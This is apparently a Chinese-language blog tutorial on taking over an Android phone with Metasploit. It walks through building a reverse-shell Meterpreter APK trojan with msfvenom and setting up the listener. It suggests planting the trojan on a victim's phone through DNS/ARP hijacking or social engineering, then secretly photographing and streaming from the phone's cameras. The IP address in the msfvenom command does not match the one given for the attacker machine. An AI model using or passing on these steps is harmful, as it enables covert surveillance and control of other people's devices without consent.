MSF入侵安卓手機 MSF又是什么
MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。
我這里做測試的系統(tǒng)是Backbox linux ,這是一款網(wǎng)絡(luò)滲透,信息安全評估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當(dāng)然還有其它的 比如Kali linux 、Back Track這些等等。
環(huán)境:Backbox linux+MSF
目標(biāo):一臺安卓手機
既然是入侵安卓手機,肯定要先配置一個安卓木馬,那我們看看本機的IP
本機IP:192.168.1.6
在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以前的MSF老版本是用msfpayload生成木馬 現(xiàn)在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時候 會提示
msfpayload無法找到命令 所以使用msfvenom即可,這里L(fēng)HOST 對應(yīng)的是本機的IP地址 LPORT對應(yīng)你要監(jiān)聽的端口 然后生成木馬的路徑
這樣我們就在/root/路徑下生成了一個APK的安卓木馬文件,至于木馬的免殺暫且不談?,F(xiàn)在我們在來啟動MSF工具
輸入命令:msfconsole
然后輸入:
1. use exploit/multi/handler 加載模塊
2.set payload android/meterpreter/reverse_tcp 選擇Payload
3.show options 查看參數(shù)設(shè)置
我們看見payload里邊有兩個參數(shù)要設(shè)置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現(xiàn)在我們來更改設(shè)置
1.set LHOST 192.168.1.6 這里的地址設(shè)置成我們剛才生成木馬的IP地址
2.set LPORT 5555 這里的端口設(shè)置成剛才我們生成木馬所監(jiān)聽的端口
3.exploit 開始執(zhí)行漏洞 開始監(jiān)聽...
OK,一切準(zhǔn)備工作準(zhǔn)備就緒。?!,F(xiàn)在要做的就是把木馬文件搞到人家的手機上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件 就會下載我們的木馬文件
還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機上做測試
安裝完成后 會在桌面上生成一個MainActivity的程序圖標(biāo) 這個就是我們剛才生成的木馬 當(dāng)我們點擊了這個圖標(biāo) 手機會沒有任何反應(yīng) 其實木馬已經(jīng)開始運行起來了
我們可以在我們的MSF里看見有一個會話連接了
這樣對方的手機就就被我們控制了,查看手機系統(tǒng)信息,輸入命令 sysinfo
webcam_list查看手機攝影頭有幾個 這里顯示兩項 分別表示有前后兩個攝像頭
webcam_snap 隱秘拍照功能
后邊跟上參數(shù)-i 指定使用那個攝像頭拍照
可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上
還可以輸入命令webcam_stream 開啟攝像頭
其它的功能還有更多,以后再為大家依依介紹,希望這篇大家會喜歡。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。